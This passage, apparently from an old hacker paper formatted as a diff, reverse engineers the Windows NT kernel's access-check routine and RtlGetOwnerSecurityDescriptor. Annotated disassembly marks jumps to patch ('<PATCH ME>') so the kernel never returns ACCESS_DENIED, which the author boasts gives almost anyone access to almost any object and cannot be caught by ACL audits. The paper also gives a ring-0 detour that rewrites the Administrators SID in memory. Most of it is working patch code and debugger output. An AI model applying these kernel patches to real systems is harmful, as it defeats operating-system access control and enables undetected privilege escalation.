+80199852		 jnz	 short loc_80199857
+80199854		 mov	 eax, [ebp+arg_4]	; arg4 pts to
+							; "USER32  "
+80199857
+80199857 loc_80199857:
+80199857		 mov	 edi, [ebp+arg_C]	; checking some flags
+							; off of this one
+8019985A		 mov	 [ebp+var_8], eax	; var_8 = arg_4
+8019985D		 test	 edi, 1000000h		; obviously flags..
+							; desired access mask
+							; I think...
+
+80199863		 jz	 short loc_801998CA	; normally this jumps..
+							; go ahead and jump
+80199865		 push	 [ebp+arg_18]
+80199868		 push	 [ebp+var_8]
+8019986B		 push	 dword_8014EE94
+80199871		 push	 dword_8014EE90
+80199877		 call	 sub_8019ADE0		; another undoc'd sub
+8019987C		 test	 al, al			; return code
+8019987E		 jnz	 short loc_80199890
+80199880		 mov	 ecx, [ebp+arg_24]
+80199883		 xor	 al, al
+80199885		 mov	 dword ptr [ecx], 0C0000061h
+8019988B		 jmp	 loc_80199C0C
+80199890 ;
+===========================================================================
+		removed source here
+801998CA ;
+===========================================================================
+801998CA
+801998CA loc_801998CA:				 ; jump from above lands here
+801998CA					 ; sub_80199836
+801998CA		 mov	 eax, [ebp+arg_0]	; arg0 pts to a
+							; Security Descriptor
+801998CD		 mov	 dx, [eax+2]		; offset 2 is that
+							; 80 04 number...
+801998D1		 mov	 cx, dx
+801998D4		 and	 cx, 4			; 80 04 become 00 04
+801998D8		 jz	 short loc_801998EA	; normally doesnt jump
+801998DA		 mov	 esi, [eax+10h]		; SD[10h] is an offset
+							; value to the DACL in
+							; the SD
+801998DD		 test	 esi, esi		; make sure it exists
+801998DF		 jz	 short loc_801998EA
+801998E1		 test	 dh, 80h
+801998E4		 jz	 short loc_801998EC
+801998E6		 add	 esi, eax		; FFWDS to first DACL
+							; in SD ******
+801998E8		 jmp	 short loc_801998EC     ; normally all good
+							; here, go ahead and
+							; jump
+801998EA ;
+===========================================================================
+801998EA
+801998EA loc_801998EA:				 ; CODE	XREF: sub_80199836+A2
+801998EA					 ; sub_80199836+A9
+801998EA		 xor	 esi, esi
+801998EC
+801998EC loc_801998EC:				 ; CODE	XREF: sub_80199836+AE
+801998EC					 ; sub_80199836+B2
+801998EC		 cmp	 cx, 4		 ; jump lands here
+801998F0		 jnz	 loc_80199BC6
+801998F6		 test	 esi, esi
+801998F8		 jz	 loc_80199BC6
+801998FE		 test	 edi, 80000h	; we normally dont match this,
+						; so go ahead and jump
+80199904		 jz	 short loc_8019995E
+*** removed source here ***
+8019995E ;
+===========================================================================
+8019995E
+8019995E loc_8019995E:				 ; CODE	XREF: sub_80199836+CE
+8019995E					 ; sub_80199836+D4 ...
+8019995E		 movzx	 eax, word ptr [esi+4]	; jump lands
+80199962		 mov	 [ebp+var_10], eax	; offset 4 is number of
+							; ACE's present in DACL
+							; var_10 = # Ace's
+80199965		 xor	 eax, eax
+80199967		 cmp	 [ebp+var_10], eax
+8019996A		 jnz	 short loc_801999B7	; normally jump
+*** removed source here ***
+801999A2 ;
+===========================================================================
+*** removed source here ***
+801999B7 ;
+===========================================================================
+801999B7
+801999B7 loc_801999B7:				 ; CODE	XREF: sub_80199836+134
+801999B7		 test	 byte ptr [ebp+arg_C+3], 2 ; looks like part of
+							   ; the flags data,
+							   ; we usually jump
+801999BB		 jz	 loc_80199AD3
+*** removed source here ***
+80199AD3 ;
+===========================================================================
+80199AD3
+80199AD3 loc_80199AD3:				 ; CODE	XREF: sub_80199836+185
+80199AD3		 mov	 [ebp+var_C], 0	 ; jump lands here
+80199ADA		 add	 esi, 8
+80199ADD		 cmp	 [ebp+var_10], 0 ; is number of ACE's zero?
+80199AE1		 jz	 loc_80199B79	 ; normally not
+80199AE7
+80199AE7 loc_80199AE7:				 ; CODE	XREF: sub_80199836+33D
+80199AE7		 test	 edi, edi	 ; the EDI register is very 
+						 ; important we will continue 
+						 ; to loop back to this point 
+						 ; as we traverse each ACE
+						 ; the EDI register is modified
+						 ; with each ACE's access mask 
+						 ; if a SID match occurs.  
+						 ; Access is allowed only if 
+						 ; EDI is completely blank
+						 ; by the time we are done. :-)
+
+80199AE9		 jz	 loc_80199B79		; jumps to exit routine
+							; if EDI is blank
+
+80199AEF		 test	 byte ptr [esi+1], 8	; checks for ACE value
+							; 8, second byte..
+							; i dont know what 
+							; this is, but if it's
+							; not 8, its not 
+							; evaluated, not 
+							; important
+80199AF3		 jnz	 short loc_80199B64
+80199AF5		 mov	 al, [esi]		; this is the ACE type,
+							; which is 0, 1, or 4
+80199AF7		 test	 al, al			; 0 is ALLOWED_TYPE and
+							; 1 is DENIED_TYPE
+80199AF9		 jnz	 short loc_80199B14	; jump to next block if
+							; it's not type 0
+80199AFB		 lea	 eax, [esi+8]		; offset 8 is the SID
+80199AFE		 push	 eax			; pushes the ACE
+80199AFF		 push	 [ebp+var_8]
+80199B02		 call	 sub_801997C2		; checks to see if the
+							; caller matches the 
+							; SID return of 1 says
+							; we matched, 0 means 
+							; we did not
+80199B07		 test	 al, al
+80199B09		 jz	 short loc_80199B64	; a match here is good,
+							; since its the ALLOWED
+							; list
+							; so a 2 byte patch can
+							; NOP out this jump 
+							; <PATCH ME>
+80199B0B		 mov	 eax, [esi+4]
+80199B0E		 not	 eax
+80199B10		 and	 edi, eax		; whiddles off the part
+							; of EDI that we 
+							; matched ..
+							; this chopping of 
+							; flags can go on through
+							; many loops
+							; remember, we are only
+							; good if ALL of EDI is
+							; chopped away...
+80199B12		 jmp	 short loc_80199B64
+80199B14 ;
+===========================================================================
+80199B14
+80199B14 loc_80199B14:				 ; CODE	XREF: sub_80199836+2C3
+80199B14		 cmp	 al, 4			; check for ACE type 4
+80199B16		 jnz	 short loc_80199B4B	; normally we aren't 
+							; this type, so jump
+*** removed source here ***
+80199B4B ;
+===========================================================================
+80199B4B
+80199B4B loc_80199B4B:				 ; CODE	XREF: sub_80199836+2E0j
+80199B4B		 cmp	 al, 1			; check for DENIED type
+80199B4D		 jnz	 short loc_80199B64
+80199B4F		 lea	 eax, [esi+8]		; offset 8 is the SID
+80199B52		 push	 eax
+80199B53		 push	 [ebp+var_8]
+80199B56		 call	 sub_801997C2		; check the callers SID
+80199B5B		 test	 al, al			; a match here is BAD, 
+							; since we are being 
+							; DENIED
+80199B5D		 jz	 short loc_80199B64	; so make JZ a normal 
+							; JMP <PATCH ME>
+
+80199B5F		 test	 [esi+4], edi		; we avoid this flag 
+							; check w/ the patch
+80199B62		 jnz	 short loc_80199B79
+80199B64
+80199B64 loc_80199B64:				 ; CODE	XREF: sub_80199836+2BD
+80199B64					 ; sub_80199836+2D3
+80199B64		 mov	 ecx, [ebp+var_10]	; our loop routine, 
+							; called from above as
+							; we loop around and 
+							; around.
+							; var_10 is the number
+							; of ACE's
+80199B67		 inc	 [ebp+var_C]		; var_C is the current 
+							; ACE
+80199B6A		 movzx	 eax, word ptr [esi+2]	; byte 3 is the offset
+							; to the next ACE
+80199B6E		 add	 esi, eax		; FFWD
+80199B70		 cmp	 [ebp+var_C], ecx	; check to see if we 
+							; are done
+80199B73		 jb	 loc_80199AE7		; if not, go back up...
+80199B79
+80199B79 loc_80199B79:				 ; CODE	XREF: sub_80199836+2AB
+80199B79					 ; sub_80199836+2B3
+80199B79		 xor	 eax, eax		; this is our general 
+							; exit routine
+80199B7B		 test	 edi, edi		; if EDI isnt empty, 
+							; then a DENIED state 
+							; was reached above
+80199B7D		 jz	 short loc_80199B91	; so patch the JZ into
+							; a JMP so we never 
+							; return ACCESS_DENIED 
+							; <PATCH ME>
+80199B7F		 mov	 ecx, [ebp+arg_1C]
+80199B82		 mov	 [ecx],	eax
+80199B84		 mov	 eax, [ebp+arg_24]
+				 ; STATUS_ACCESS_DENIED
+80199B87		 mov	 dword ptr [eax], 0C0000022h	
+80199B8D		 xor	 al, al
+80199B8F		 jmp	 short loc_80199C0C
+80199B91 ;
+===========================================================================
+80199B91
+80199B91 loc_80199B91:				 ; CODE	XREF: sub_80199836+347
+80199B91		 mov	 eax, [ebp+1Ch]
+80199B94		 mov	 ecx, [ebp+arg_1C]	; result code into 
+							; &arg_1C
+80199B97		 or	 eax, [ebp+arg_C]	; checked passed in 
+							; mask
+80199B9A		 mov	 [ecx],	eax
+80199B9C		 mov	 ecx, [ebp+arg_24]	; result code into 
+							; &arg_24, should be 
+							; zero
+80199B9F		 jnz	 short loc_80199BAB	; if everything above 
+							; went OK, we should
+jump
+80199BA1		 xor	 al, al
+80199BA3		 mov	 dword ptr [ecx], 0C0000022h
+80199BA9		 jmp	 short loc_80199C0C
+80199BAB ;
+===========================================================================
+80199BAB
+80199BAB loc_80199BAB:				 ; CODE	XREF: sub_80199836+369
+80199BAB		 mov	 dword ptr [ecx], 0	; Good and Happy 
+							; things, we passed!
+80199BB1		 test	 ebx, ebx
+80199BB3		 jz	 short loc_80199C0A
+80199BB5		 push	 [ebp+arg_20]
+80199BB8		 push	 dword ptr [ebp+var_2]
+80199BBB		 push	 dword ptr [ebp-1]
+80199BBE		 push	 ebx
+80199BBF		 call	 sub_8019DC80
+80199BC4		 jmp	 short loc_80199C0A
+80199BC6 ;
+===========================================================================
+	    removed code here
+80199C0A loc_80199C0A:				 ; CODE	XREF: sub_80199836+123
+80199C0A					 ; sub_80199836+152
+80199C0A		 mov	 al, 1
+80199C0C
+80199C0C loc_80199C0C:				 ; CODE	XREF: sub_80199836+55
+80199C0C					 ; sub_80199836+8F
+80199C0C		 pop	 edi
+80199C0D		 pop	 esi
+80199C0E		 pop	 ebx
+80199C0F		 mov	 esp, ebp
+80199C11		 pop	 ebp
+80199C12		 retn	 28h		 ; Outta Here!
+80199C12 sub_80199836	 endp
+
+Whew!
+
+Some STRUCTURE dumps along the way:
+
+:d eax
+0023:E1A1C174 01 00 04 80 DC 00 00 00-EC 00 00 00 00 00 00 00  ................
+; this looks like a SD
+0023:E1A1C184 14 00 00 00 02 00 C8 00-08 00 00 00 00 09 18 00  ................
+0023:E1A1C194 00 00 00 10 01 01 00 00-00 00 00 03 00 00 00 00  ................
+0023:E1A1C1A4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00  ................
+0023:E1A1C1B4 00 00 00 03 00 00 00 00-00 00 00 00 00 09 18 00  ................
+0023:E1A1C1C4 00 00 00 10 01 01 00 00-00 00 00 05 12 00 00 00  ................
+0023:E1A1C1D4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00  ................
+0023:E1A1C1E4 00 00 00 05 12 00 00 00-00 00 00 00 00 09 18 00  ................
+
+:d esi
+0023:E1A1C188 02 00 C8 00 08 00 00 00-00 09 18 00 00 00 00 10  ................
+; OFFSET into the SD (DACL)
+0023:E1A1C198 01 01 00 00 00 00 00 03-00 00 00 00 00 00 00 00  ................
+0023:E1A1C1A8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 03  ................
+0023:E1A1C1B8 00 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10  ................
+0023:E1A1C1C8 01 01 00 00 00 00 00 05-12 00 00 00 00 00 00 00  ................
+0023:E1A1C1D8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 05  ................
+0023:E1A1C1E8 12 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10  ................
+0023:E1A1C1F8 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00  ........ ... ...
+
+
+The following formats appear to be the SD, DACL, and ACE:
+
+SD:
+-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
+r |  |04|80|fo|  |  |  |fg|  |  |  |  |  |  |fd|  |  --==>
+-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
+r: Revision, must be 1
+fo: Offset to Owner SID
+fg: Offset to Group SID
+fd: Offset to DACL
+
+ACL:
+-- -- -- -- -- -- -- -- -- --
+r |  |  |  |na|  |  |  |sa|  |  --==>
+-- -- -- -- -- -- -- -- -- --
+r: Revision?
+na: Number of ACE's
+sa: Start of first ACE
+
+ACE:
+-- -- -- -- -- -- -- -- -- --
+t |i |oa|  |am|  |  |  |ss|  |  --==>
+-- -- -- -- -- -- -- -- -- --
+t: type, 0, 1, or 4
+i: the ACE is ignored if this value isn't 8
+oa: offset to next ACE
+am: access mask associated with this SID
+ss: start of the SID, normally at offset 8, but for ACE type 4, will be at
+    offset 0Ch
+
+So there you have it, a 4 byte patch.  Application of this patch will allow
+almost anyone access to almost any object on your NT domain.  Also, it is
+undetectable when auditing ACL's and the such.  The only indication something
+is wrong is the fact your now opening the SAM database from a normal account 
+w/o a hitch... I can kill any process without being denied access.. God knows 
+what the NULL User session can get away with!.  I like that.  8-/.  Gee, it's 
+almost USEFUL isn't it?
+
+
+Reverse Engineering & Patch of the RTLGetOwnerSecurityDescriptor() function
+---------------------------------------------------------------------------
+
+As if the last patch wasn't good enough, this patch should illustrate how easy
+it is add your own code to the Kernel.  Simply by patching a single jump, I 
+was able to detour the execution path into a highwayman's patch, and return 
+back to normal execution without a hitch.  This patch alters a SID in memory, 
+violating the integrity of the security system.  With a little creative light,
+this patch could be so much more.  There are hundreds of routines in the 
+ntoskrnl.exe. You are executing your own code in ring-0, so anything is 
+possible.  If for any other reason, this paper should open your mind to the 
+possibilities.  Reversing the NT Kernel is nothing new, I am quite sure.  
+I would bet that the NSA has the full source to the NT Kernel, and has written
+some very elaborate patches.  In fact, they were probably on that for NT 3.5.
+
+80184AAC ;
+===========================================================================
+80184AAF		 align 4
+80184AB0 ; Exported entry 719. RtlGetOwnerSecurityDescriptor
+80184AB0
+80184AB0 ;
+===========================================================================
+80184AB0
+80184AB0 ;		 S u b r o u t i n e
+80184AB0 ; Attributes: bp-based	frame
+80184AB0
+80184AB0		 public	RtlGetOwnerSecurityDescriptor
+80184AB0 RtlGetOwnerSecurityDescriptor proc near ; CODE	XREF: sub_8018F318+22
+80184AB0
+80184AB0 arg_0		 = dword ptr  8
+80184AB0 arg_4		 = dword ptr  0Ch
+80184AB0 arg_8		 = dword ptr  10h
+80184AB0
+80184AB0		 push	 ebp
+80184AB1		 mov	 edx, [esp+arg_0]
+80184AB5		 mov	 ebp, esp
+80184AB7		 push	 esi
+
+//
+// MessageId: STATUS_UNKNOWN_REVISION
+//
+// MessageText:
+//
+//  Indicates a revision number encountered or specified is not one
+//  known by the service.  It may be a more recent revision than the
+//  service is aware of.
+//
+#define STATUS_UNKNOWN_REVISION          ((NTSTATUS)0xC0000058L)
+
+On SD Revision:
+The user mode function InitializeSecurityDescriptor() will set the revision
+number for the SD. The InitializeSecurityDescriptor() function initializes a 
+new security descriptor.
+
+BOOL InitializeSecurityDescriptor(
+PSECURITY_DESCRIPTOR pSecurityDescriptor,  // address of security descriptor
+DWORD dwRevision  // revision level
+);
+
+Parameters:
+pSecurityDescriptor: Points to a SECURITY_DESCRIPTOR structure that the
+function initializes.
+
+dwRevision: Specifies the revision level to assign to the security descriptor.
+This must be SECURITY_DESCRIPTOR_REVISION.
+
+80184AB8		 cmp	 byte ptr [edx], 1	; Ptr to decimal 
+							; value usually 01, 
+							; (SD Revision)
+80184ABB		 jz	 short loc_80184AC4
+				 ; STATUS CODE (STATUS_UNKNOWN_REVISION)
+80184ABD		 mov	 eax, 0C0000058h	
+80184AC2		 jmp	 short loc_80184AF3	; will exit
+
+The next block here does some operations against the object stored *edx, which
+is our first argument to this function.  I think this may be a SD.  There are
+two different forms of an SD, absolute and relative.. here is the doc:
+
+A security descriptor can be in absolute or self-relative form. In
+self-relative form, all members of the structure are located contiguously 
+in memory. In absolute form, the structure only contains pointers to the 
+members.
+
+This [edx] object is passed in as absolute:
+
+Argument 1 (a SECURITY_DESCRIPTOR structure):
+:d edx
+0023:E1F47488 01 00 04 80 5C 00 00 00-6C 00 00 00 00 00 00 00  ....\...l.......
+; 01 Revision, Flags 04,
+; Offset to Owner SID is 5C,
+; Offset to Primary Group SID is 6C
+
+0023:E1F47498 14 00 00 00 02 00 48 00-02 00 00 00 00 00 18 00  ......H.........
+0023:E1F474A8 FF 00 0F 00 01 02 00 00-00 00 00 05 20 00 00 00  ............ ...
+0023:E1F474B8 20 02 00 00 00 00 14 00-FF 00 0F 00 01 01 00 00   ...............
+0023:E1F474C8 00 00 00 05 12 00 00 00-00 00 4E 00 C8 FD 14 00  ..........N.....
+0023:E1F474D8 E8 00 14 00 41 00 64 00-6D 00 69 00 01 02 00 00  ....A.d.m.i.....
+; SIDS start here, see below
+0023:E1F474E8 00 00 00 05 20 00 00 00-20 02 00 00 01 05 00 00  .... ... .......
+0023:E1F474F8 00 00 00 05 15 00 00 00-BA 5D FF 0C 5C 4F CF 51  .........]..\O.Q
+
+80184AC4 ;
+===========================================================================
+80184AC4
+80184AC4 loc_80184AC4:			; CODE	XREF: 
+					; RtlGetOwnerSecurityDescriptor+B
+80184AC4		 mov	 eax, [edx+4]    ; we are here if the revision
+						 ; is good
+80184AC7		 xor	 ecx, ecx
+80184AC9		 test	 eax, eax	 ; 01 00 04 80 >5C< which is 
+						 ; [edx+4] must not be zero
+						 ; if the value IS zero, this 
+						 ; means the SD does NOT have a
+						 ; owner, and it sets argument
+						 ; 2 to NULL, then returns, 
+						 ; ignoring argument 3 
+						 ; altogether.
+80184ACB		 jnz	 short loc_80184AD4
+80184ACD		 mov	 esi, [ebp+arg_4]
+80184AD0		 mov	 [esi],	ecx
+80184AD2		 jmp	 short loc_80184AE1
+80184AD4 ;
+===========================================================================
+80184AD4
+80184AD4 loc_80184AD4:			; CODE	XREF: 
+					; RtlGetOwnerSecurityDescriptor+1B
+80184AD4		 test	 byte ptr [edx+3], 80h   ; 01 00 04 >80< 5C 
+							 ; which is [edx+3]
+must be 80
+80184AD8		 jz	 short loc_80184ADC
+80184ADA		 add	 eax, edx		 ; adds edx to 5C, 
+							 ; which must be an 
+							 ; offset to the SID
+							 ; within the SD
+
+Note a couple of SIDS hanging around in this memory location.  The first one is
+the Owner, the second one must be the Group.  The first SID, 1-5-20-220 is
+BUILTIN\Administrators.  By changing the 220 to a 222, we can alter this to be
+BUILTIN\Guests.  This will cause serious security problems.  That second SID
+happens to be long nasty one.. that is your first indication that it's NOT a
+built-in group.  In fact, in this case, the group is ANSUZ\None, a local group
+on my NT Server (my server is obviously named ANSUZ.. ;)
+
+:d eax
+0023:E1A49F84 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00  ........ ... ...
+; This is a SID in memory (1-5-20-220)
+0023:E1A49F94 01 05 00 00 00 00 00 05-15 00 00 00 BA 5D FF 0C  .............]..
+; another SID
+0023:E1A49FA4 5C 4F CF 51 FD 28 9A 4E-01 02					
+; (1-5-15-CFF5DBA-51CF4F5C-4E9A28FD-201)
+
+Here we start working with arguments 1 & 2:
+80184ADC
+80184ADC loc_80184ADC:		 ; CODE	XREF: 
+				 ; RtlGetOwnerSecurityDescriptor+28
+80184ADC		 mov	 esi, [ebp+arg_4]
+80184ADF		 mov	 [esi],	eax	 ; moving the address of the 
+						 ; SID through the user
+						 ; supplied ptr (PSID pOwner)
+80184AE1
+80184AE1 loc_80184AE1:		 ; CODE	XREF: 
+				 ; RtlGetOwnerSecurityDescriptor+22
+80184AE1		 mov	 ax, [edx+2]	 ; some sort of flags 
+						 ; 01 00 >04< 80 5C
+80184AE5		 mov	 edx, [ebp+arg_8]; argument 3, which is to be 
+						 ; filled in with
+flags data
+80184AE8		 and	 al, 1
+80184AEA		 cmp	 al, 1		 ; checking against a mask of 
+						 ; 0x01
+80184AEC		 setz	 cl		 ; set based on flags register
+						 ; (if previous compare was
+true)
+80184AEF		 xor	 eax, eax	 ; status is zero, all good ;)
+80184AF1		 mov	 [edx],	cl	 ; the value is set for 
+						 ; SE_OWNER_DEFAULTED 
+						 ; true/false
+80184AF3
+80184AF3 loc_80184AF3:		 ; CODE	XREF: 
+				 ; RtlGetOwnerSecurityDescriptor+12
+80184AF3		 pop	 esi
+80184AF4		 pop	 ebp
+80184AF5		 retn	 0Ch		 ; outta here, status in EAX
+80184AF5 RtlGetOwnerSecurityDescriptor endp
+
+
+This routine is called from the following stack(s):
+
+(NtOpenProcessToken)
+Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor  (ET=31.98
+milliseconds)
+:stack at 001B:00000000 (SS:EBP 0010:00000000)
+ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8E3FF04)
+ntoskrnl!NtOpenProcessToken+025E at 0008:80198834 (SS:EBP 0010:F8E3FEEC)
+ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8E3FE50)
+ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8E3FD80)
+ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8E3FD48)
+ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8E3FD34)
+ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
+0010:F8E3FD20)
+=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
+0010:F8E3FD00)
+
+(PsCreateWin32Process)
+Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor  (ET=3.62 milliseconds)
+:stack
+ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
+ntoskrnl!PsCreateWin32Process+01E7 at 0008:80192B5D (SS:EBP 0010:F8CDFEDC)
+ntoskrnl!PsCreateSystemThread+04CE at 0008:8019303E (SS:EBP 0010:F8CDFE6C)
+ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDC8)
+ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCF8)
+ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCC0)
+ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCAC)
+ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
+0010:F8CDFC98)
+=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
+0010:F8CDFC78)
+
+(PsCreateSystemThread)
+:stack
+ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
+ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
+ntoskrnl!PsCreateSystemProcess+05FD at 0008:801938B1 (SS:EBP 0010:F8CDFE8C)
+ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDEC)
+ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFD1C)
+ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCE4)
+ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCD0)
+ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
+0010:F8CDFCBC)
+=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
+0010:F8CDFC9C)
+
+(SeTokenImpersonationLevel)
+:stack
+ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
+ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
+ntoskrnl!PsRevertToSelf+0063 at 0008:8013577D (SS:EBP 0010:F8CDFE8C)
+ntoskrnl!SeTokenImpersonationLevel+01A3 at 0008:8019F12F (SS:EBP 0010:F8CDFDE8)
+ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFD9C)
+ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCCC)
+ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFC94)
+ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFC80)
+ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
+0010:F8CDFC6C)
+=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP
+0010:F8CDFC4C)
+
+
+I began by trying to patch this call.  I decided to try and detect the Owner
+SID of BUILTIN\Administrators (1-5-20-220) and change it to BUILTIN\Users
+(1-5-20-221) on the fly.  The following code is what I patched in:
+
+First, I located a region of memory where I could dump some extra code.  For
+testing, I chose the region at 08:8000F2B0.  I found it to be initially all
+zeroed out, so I figured it safe for a while. Next, I assembled some
+instructions into this new area:
+
+8000F2B0:	push ebx
+		mov ebx, [eax + 08]
+		cmp ebx, 20		  	; check the 20 in 1-5-20-XXX
+		nop				; nop's are leftovers from 
+						; debugging
+		nop
+		jnz 8000f2c2			; skip it if we aren't looking 
+						; at a 20
+		mov word ptr [eax+0c], 221	; write over old RID w/ new RID
+						; of 221
+		nop
+8000f2c2:	pop ebx
+		nop
+		mov esi, [ebp + 0c]		; the two instructions
+		mov [esi], eax			; that I nuked to make the 
+						; initial jump
+		jmp 80184ae1
+
+Now, notice the last two instructions prior to the jump back to NT.  To make
+this call, I had to install a JMP instruction into the NT subroutine itself.
+Doing that nuked two actual instructions, as follows:
+
+Original code:
+
+80184ADC		 mov	 esi, [ebp+arg_4];<**===--- PATCHING A JUMP 
+						 ;          HERE
+80184ADF		 mov	 [esi],	eax
+80184AE1		 mov	 ax, [edx+2]	 ; some sort of flags 
+						 ; 01 00 >04< 80 5C
+80184AE5		 mov	 edx, [ebp+arg_8]; argument 3, which is to be 
+						 ; filled in with flags data
+
+After patch:
+
+80184ADC		 JMP 8000F2B0		 ; Note: this nuked two real 
+						 ; instructions...
+
+80184AE1		 mov	 ax, [edx+2]	 ; some sort of flags 
+						 ; 01 00 >04< 80 5C
+
+80184AE5		 mov	 edx, [ebp+arg_8]; argument 3, which is to be 
+						 ; filled in with flags data
+
+So, to correct this, the code that I am jumping to runs the two missing
+instructions:
+
+		mov esi, [ebp + 0c]		; the two instructions
+		mov [esi], eax			; that I nuked to make the 
+						; initial jump
+
+Alas, all is good.  I tested this patch for quite some time without a problem.
+To verify that it was working, I checked the memory during the patch, and sure
+enough, it was turning SID 1-5-20-220 into SID 1-5-20-221.  However, as with
+all projects, I was not out of the water yet.  When getting the security 
+properties for a file, the Owner still shows up as Administrators.  This patch
+is clearly called during such a query, as I have set breakpoints.  However, 
+the displayed OWNER is still administrators, even though I am patching the 
+SID in memory. Further investigation has revealed that this routine isn't 
+called to check access to a file object, but is called for opening process 
+tokens, creating processes, and creating threads.  Perhaps someone could shed
+some more light on this? Nonetheless, the methods used in this patch can be 
+re-purposed for almost any Kernel routine, so I hope it has been a useful 
+journey.  
+
+
+Appendix A: Exported functions for the SRM:
+-------------------------------------------
+
+SeAccessCheck
+SeAppendPrivileges
+SeAssignSecurity
+SeAuditingFileEvents
+SeAuditingFileOrGlobalEvents
+SeCaptureSecurityDescriptor
+SeCaptureSubjectContext
+SeCloseObjectAuditAlarm
+SeCreateAccessState
+SeCreateClientSecurity
+SeDeassignSecurity
+SeDeleteAccessState
+SeDeleteObjectAuditAlarm
+SeExports
+SeFreePrivileges
+SeImpersonateClient
+SeLockSubjectContext
+SeMarkLogonSessionForTerminationNotification
+SeOpenObjectAuditAlarm
+SeOpenObjectForDeleteAuditAlarm
+SePrivilegeCheck
+SePrivilegeObjectAuditAlarm
+SePublicDefaultDacl
+SeQueryAuthenticationIdToken
+SeQuerySecurityDescriptorInfo
+SeRegisterLogonSessionTerminatedRoutine
+SeReleaseSecurityDescriptor
+SeReleaseSubjectContext
+SeSetAccessStateGenericMapping
+SeSetSecurityDescriptorInfo
+SeSinglePrivilegeCheck
+SeSystemDefaultDacl
+SeTokenImpersonationLevel
+SeTokenType
+SeUnlockSubjectContext
+SeUnregisterLogonSessionTerminatedRoutine
+SeValidSecurityDescriptor
+
+Here are the exported functions for the Object Manager:
+ObAssignSecurity
+ObCheckCreateObjectAccess
+ObCheckObjectAccess
+ObCreateObject
+ObDereferenceObject
+ObfDereferenceObject
+ObFindHandleForObject
+ObfReferenceObject
+ObGetObjectPointerCount
+ObGetObjectSecurity
+ObInsertObject
+ObMakeTemporaryObject
+ObOpenObjectByName
+ObOpenObjectByPointer
+ObQueryNameString
+ObQueryObjectAuditingByHandle
+ObReferenceObjectByHandle
+ObReferenceObjectByName
+ObReferenceObjectByPointer
+ObReleaseObjectSecurity
+ObSetSecurityDescriptorInfo
+
+Here are the exported functions for the IO Manager:
+IoAcquireCancelSpinLock
+IoAcquireVpbSpinLock
+IoAdapterObjectType
+IoAllocateAdapterChannel
+IoAllocateController
+IoAllocateErrorLogEntry
+IoAllocateIrp
+IoAllocateMdl
+IoAssignResources
+IoAttachDevice
+IoAttachDeviceByPointer
+IoAttachDeviceToDeviceStack
+IoBuildAsynchronousFsdRequest
+IoBuildDeviceIoControlRequest
+IoBuildPartialMdl
+IoBuildSynchronousFsdRequest
+IoCallDriver
+IoCancelIrp
+IoCheckDesiredAccess
+IoCheckEaBufferValidity
+IoCheckFunctionAccess
+IoCheckShareAccess
+IoCompleteRequest
+IoConnectInterrupt
+IoCreateController
+IoCreateDevice
+IoCreateFile
+IoCreateNotificationEvent
+IoCreateStreamFileObject
+IoCreateSymbolicLink
+IoCreateSynchronizationEvent
+IoCreateUnprotectedSymbolicLink
+IoDeleteController
+IoDeleteDevice
+IoDeleteSymbolicLink
+IoDetachDevice
+IoDeviceHandlerObjectSize
+IoDeviceHandlerObjectType
+IoDeviceObjectType
+IoDisconnectInterrupt
